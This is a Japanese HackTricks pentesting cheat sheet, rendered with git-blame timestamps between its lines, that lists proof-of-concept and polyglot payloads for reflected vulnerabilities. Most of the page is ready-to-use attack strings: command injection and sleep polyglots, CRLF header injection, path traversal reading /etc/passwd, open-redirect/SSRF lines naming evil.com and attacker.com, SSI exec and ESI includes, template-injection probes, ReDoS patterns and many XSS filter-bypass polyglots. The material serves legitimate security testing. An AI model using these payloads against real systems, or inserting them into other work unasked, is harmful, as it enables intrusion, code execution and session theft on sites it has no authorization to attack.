2024-07-19 10:21:08 +00:00
# Reflecting Techniques - PoCs and Polygloths CheatSheet
2022-04-28 16:01:33 +00:00
2024-07-19 10:21:08 +00:00
{% hint style="success" %}
AWSハッキングを学び、実践する: < img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCPハッキングを学び、実践する: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 10:21:08 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 10:21:08 +00:00
< summary > HackTricksをサポートする< / summary >
2022-04-28 16:01:33 +00:00
2024-07-19 10:21:08 +00:00
* [**サブスクリプションプラン** ](https://github.com/sponsors/carlospolop )を確認してください!
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**をフォローしてください。**
* **ハッキングトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 10:21:08 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-07-19 10:21:08 +00:00
これらのPoCとポリグロスの目的は、テスターに**応答に反映される可能性のある脆弱性の迅速な要約**を提供することです。
2021-06-26 12:03:36 +00:00
2021-06-26 12:11:00 +00:00
{% hint style="warning" %}
2024-07-19 10:21:08 +00:00
この**チートシートは各脆弱性の包括的なテストリストを提案していません**、基本的なもののみです。より包括的なテストを探している場合は、提案された各脆弱性にアクセスしてください。
2021-06-26 12:11:00 +00:00
{% endhint %}
2021-06-26 12:03:36 +00:00
2021-06-26 12:11:00 +00:00
{% hint style="danger" %}
2024-07-19 10:21:08 +00:00
**XXEのようなContent-Type依存のインジェクションは見つかりません**、通常、XMLデータを送信するリクエストを見つけた場合は自分で試すことになります。ここでは**データベースインジェクションも見つかりません**、なぜなら一部のコンテンツが反映される可能性があっても、バックエンドDB技術と構造に大きく依存するからです。
2021-06-26 12:11:00 +00:00
{% endhint %}
2021-06-26 12:03:36 +00:00
2024-07-19 10:21:08 +00:00
## ポリグロスリスト
2021-06-26 10:02:37 +00:00
```python
{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
2021-06-26 12:03:36 +00:00
< br > < b > < h1 > THIS IS AND INJECTED TITLE < / h1 >
2021-06-26 10:02:37 +00:00
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
<!-- #echo var="DATE_LOCAL" --> <!-- #exec cmd="ls" --> < esi:include src = http://attacker.com/ > x=< esi:assign name = "var1" value = "'cript'" / > < s < esi:vars name = "$(var1)" / > >alert(/Chrome%20XSS%20filter%20bypass/);< /s< esi:vars name = "$(var1)" / > >
{{7*7}}${7*7}< %= 7*7 %>${{7*7}}#{7*7}${{< %[%'"}}%\
< xsl:value-of select = "system-property('xsl:version')" / > < esi:include src = "http://10.10.10.10/data/news.xml" stylesheet = "http://10.10.10.10//news_template.xsl" > < / esi:include >
" onclick=alert() a="
'">< img src = x onerror = alert(1) / >
javascript:alert()
javascript:"/*'/*`/*--></ noscript ></ title ></ textarea ></ style ></ template ></ noembed ></ script >< html \" onmouseover = /*<svg/*/onload=alert()// >
-->'"/></ sCript >< deTailS open x = ">" ontoggle = (co \u006efirm)`` >
">>< marquee >< img src = x onerror = confirm(1) ></ marquee > " >< /plaintext\>< /|\>< plaintext / onmouseover = prompt(1) >< script > prompt ( 1 )</ script > @gmail.com< isindex formaction = javascript:alert(/XSS/) type = submit > '-->" ></ script >< script > alert ( 1 )</ script > ">< img / id = "confirm( 1)" / alt = "/" src = "/" onerror = eval(id&%23x29; > '">< img src = "http: //i.imgur.com/P8mL8.jpg" >
" onclick=alert(1)//< button ‘ onclick = alert(1)// > */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >< / SCRIPT > ">'>< SCRIPT > alert ( String . fromCharCode ( 88 , 83 , 83 ) ) < / SCRIPT >
```
2024-01-01 19:09:41 +00:00
## [クライアントサイドテンプレートインジェクション](../client-side-template-injection-csti.md)
2021-06-25 19:22:16 +00:00
2024-07-19 10:21:08 +00:00
### 基本テスト
2021-10-18 11:21:18 +00:00
```
2021-06-25 16:39:43 +00:00
{{7*7}}
2021-06-25 16:50:01 +00:00
[7*7]
2021-06-25 16:39:43 +00:00
```
2024-01-01 19:09:41 +00:00
### ポリグロット
2021-06-25 17:01:56 +00:00
```bash
{{7*7}}[7*7]
```
2024-01-01 19:09:41 +00:00
## [コマンドインジェクション](../command-injection.md)
2021-06-25 17:01:56 +00:00
2024-02-09 08:23:12 +00:00
### 基本テスト
2021-06-25 17:01:56 +00:00
```bash
2021-06-26 10:02:37 +00:00
;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
2021-06-25 16:50:01 +00:00
`ls`
$(ls)
2021-06-25 17:01:56 +00:00
```
2024-02-09 08:23:12 +00:00
### ポリグロット
2021-06-25 17:01:56 +00:00
```bash
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
2021-06-25 16:50:01 +00:00
```
2024-01-01 19:09:41 +00:00
## [CRLF](../crlf-0d-0a.md)
2023-07-07 23:42:27 +00:00
2024-01-01 19:09:41 +00:00
### 基本テスト
2021-06-25 17:01:56 +00:00
```bash
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
```
2024-01-01 19:09:41 +00:00
## ダングリングマークアップ
2023-07-07 23:42:27 +00:00
2024-01-01 19:09:41 +00:00
### 基本テスト
2023-07-07 23:42:27 +00:00
```markup
< br > < b > < h1 > THIS IS AND INJECTED TITLE < / h1 >
```
2024-01-01 19:09:41 +00:00
## [ファイルインクルージョン/パストラバーサル](../file-inclusion/)
2021-06-25 19:22:16 +00:00
2024-01-01 19:09:41 +00:00
### 基本テスト
2021-06-25 19:22:16 +00:00
```bash
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
```
2024-02-09 08:23:12 +00:00
## [オープンリダイレクト](../open-redirect.md) / [サーバーサイドリクエストフォージェリ](../ssrf-server-side-request-forgery/)
2021-06-25 19:22:16 +00:00
2024-07-19 10:21:08 +00:00
### 基本テスト
2021-06-25 19:22:16 +00:00
```bash
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
```
2024-01-01 19:09:41 +00:00
## [ReDoS](../regular-expression-denial-of-service-redos.md)
2023-07-07 23:42:27 +00:00
2024-01-01 19:09:41 +00:00
### 基本テスト
2021-06-25 19:22:16 +00:00
```bash
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
```
2024-01-01 19:09:41 +00:00
## [サーバーサイドインクルージョン/エッジサイドインクルージョン](../server-side-inclusion-edge-side-inclusion-injection.md)
2021-06-25 19:22:16 +00:00
2024-02-09 08:23:12 +00:00
### 基本テスト
2021-06-25 19:22:16 +00:00
```markup
<!-- #echo var="DATE_LOCAL" -->
<!-- #exec cmd="ls" -->
< esi:include src = http://attacker.com/ >
2021-06-25 19:23:35 +00:00
x=< esi:assign name = "var1" value = "'cript'" / > < s < esi:vars name = "$(var1)" / > >alert(/Chrome%20XSS%20filter%20bypass/);< /s< esi:vars name = "$(var1)" / > >
2021-06-25 19:22:16 +00:00
```
2024-07-19 10:21:08 +00:00
### ポリグロス
2021-06-25 20:23:31 +00:00
```markup
<!-- #echo var="DATE_LOCAL" --> <!-- #exec cmd="ls" --> < esi:include src = http://attacker.com/ > x=< esi:assign name = "var1" value = "'cript'" / > < s < esi:vars name = "$(var1)" / > >alert(/Chrome%20XSS%20filter%20bypass/);< /s< esi:vars name = "$(var1)" / > >
```
2024-02-09 08:23:12 +00:00
## [サーバーサイドリクエストフォージェリ](../ssrf-server-side-request-forgery/)
2021-06-25 20:23:31 +00:00
2024-07-19 10:21:08 +00:00
Open Redirectで使用されるのと同じテストがここでも使用できます。
2021-06-25 20:23:31 +00:00
2024-02-09 08:23:12 +00:00
## [サーバーサイドテンプレートインジェクション](../ssti-server-side-template-injection/)
2021-06-25 20:23:31 +00:00
2024-07-19 10:21:08 +00:00
### 基本テスト
2021-06-25 20:23:31 +00:00
```markup
${{< %[%'"}}%\
{{7*7}}
${7*7}
< %= 7*7 %>
${{7*7}}
#{7*7}
```
2024-01-01 19:09:41 +00:00
### ポリグロット
2021-06-25 20:23:31 +00:00
```python
{{7*7}}${7*7}< %= 7*7 %>${{7*7}}#{7*7}${{< %[%'"}}%\
```
2024-02-09 08:23:12 +00:00
## [XSLTサーバーサイドインジェクション](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
2021-06-25 20:23:31 +00:00
2024-01-01 19:09:41 +00:00
### 基本テスト
2021-06-25 20:23:31 +00:00
```markup
< xsl:value-of select = "system-property('xsl:version')" / >
< esi:include src = "http://10.10.10.10/data/news.xml" stylesheet = "http://10.10.10.10//news_template.xsl" > < / esi:include >
```
2024-07-19 10:21:08 +00:00
### ポリグロス
2024-01-01 19:09:41 +00:00
```markup
< xsl:value-of select = "system-property('xsl:version')" / > < esi:include src = "http://10.10.10.10/data/news.xml" stylesheet = "http://10.10.10.10//news_template.xsl" > < / esi:include >
```
## XSS
2023-07-07 23:42:27 +00:00
2024-02-09 08:23:12 +00:00
### 基本テスト
2023-07-07 23:42:27 +00:00
```markup
" onclick=alert() a="
'">< img src = x onerror = alert(1) / >
javascript:alert()
```
2024-07-19 10:21:08 +00:00
### ポリグロス
2023-07-07 23:42:27 +00:00
```markup
javascript:"/*'/*`/*--></ noscript ></ title ></ textarea ></ style ></ template ></ noembed ></ script >< html \" onmouseover = /*<svg/*/onload=alert()// >
-->'"/></ sCript >< deTailS open x = ">" ontoggle = (co \u006efirm)`` >
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//< /stYle/< /titLe/< /teXtarEa/< /scRipt/--!>\x3csVg/< sVg / oNloAd = alert()// > \x3e
2021-06-26 10:02:37 +00:00
">>< marquee >< img src = x onerror = confirm(1) ></ marquee > " >< /plaintext\>< /|\>< plaintext / onmouseover = prompt(1) >< script > prompt ( 1 )</ script > @gmail.com< isindex formaction = javascript:alert(/XSS/) type = submit > '-->" ></ script >< script > alert ( 1 )</ script > ">< img / id = "confirm( 1)" / alt = "/" src = "/" onerror = eval(id&%23x29; > '">< img src = "http: //i.imgur.com/P8mL8.jpg" >
" onclick=alert(1)//< button ‘ onclick = alert(1)// > */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >< / SCRIPT > ">'>< SCRIPT > alert ( String . fromCharCode ( 88 , 83 , 83 ) ) < / SCRIPT >
javascript://'/< / title > < / style > < / textarea > < / script > -->< p " onclick = alert()// > */alert()/*
javascript://-->< / script > < / title > < / style > "/< / textarea > */< alert ( ) / * ' onclick = alert()// > a
javascript://< / title > "/< / script > < / style > < /textarea/-->*/< alert ( ) / * ' onclick = alert()// > /
javascript://< / title > < / style > < / textarea > -->< / script > < a " / / ' onclick = alert()// > */alert()/*
javascript://'//" -->< / textarea > < / style > < / script > < / title > < b onclick = alert()// > */alert()/*
javascript://< / title > < / textarea > < / style > < /script -->< li ' / / " ' * / alert ( ) / * ' , onclick = alert()//
javascript:alert()//-->< / script > < / textarea > < / style > < / title > < a " / / ' onclick = alert()// > */alert()/*
-->< / script > < / title > < / style > "/< / textarea > < a ' onclick = alert()// > */alert()/*
/< /title/'/< /style/< /script/< /textarea/-->< p " onclick = alert()// > */alert()/*
javascript://-->< / title > < / style > < / textarea > < / script > < svg " / / ' onclick = alert()//
/< /title/'/< /style/< /script/-->< p " onclick = alert()// > */alert()/*
-->'"/></ sCript >< svG x = ">" onload = (co \u006efirm)`` >
< svg % 0Ao % 00nload = %09((pro \u006dpt))()//
javascript:"/*'/*`/*\" /*</ title ></ style ></ textarea ></ noscript ></ noembed ></ template > < /script/-->< svg / onload = /*<html/*/onmouseover=alert()// >
javascript:"/*\"/*`/*' /*</ template ></ textarea ></ noembed ></ noscript ></ title ></ style ></ script > -->< svg onload = /*<html/*/onmouseover=alert()// >
javascript:`//"//\"//</ title ></ textarea ></ style ></ noscript ></ noembed ></ script ></ template >< svg / onload = '/*--><html */ onmouseover=alert()//' > `
%0ajavascript:`/*\"/*-->< svg onload='/*</ template ></ noembed ></ noscript ></ style ></ title ></ textarea ></ script >< html onmouseover = "/**/ alert(test)//'" > `
javascript:/*-->< / title > < / style > < / textarea > < / script > < / xmp > < svg / onload = '+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//' >
javascript:"/*'/*`/*--></ noscript ></ title ></ textarea ></ style ></ template ></ noembed ></ script >< html \" onmouseover = /*<svg/*/onload=document.location=`//localhost/mH`// >
```
2024-07-19 10:21:08 +00:00
{% hint style="success" %}
AWSハッキングを学び、実践する: < img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCPハッキングを学び、実践する: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 10:21:08 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 10:21:08 +00:00
< summary > HackTricksをサポートする< / summary >
2022-04-28 16:01:33 +00:00
2024-07-19 10:21:08 +00:00
* [**サブスクリプションプラン** ](https://github.com/sponsors/carlospolop )を確認してください!
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**をフォローしてください。**
* **ハッキングトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 10:21:08 +00:00
{% endhint %}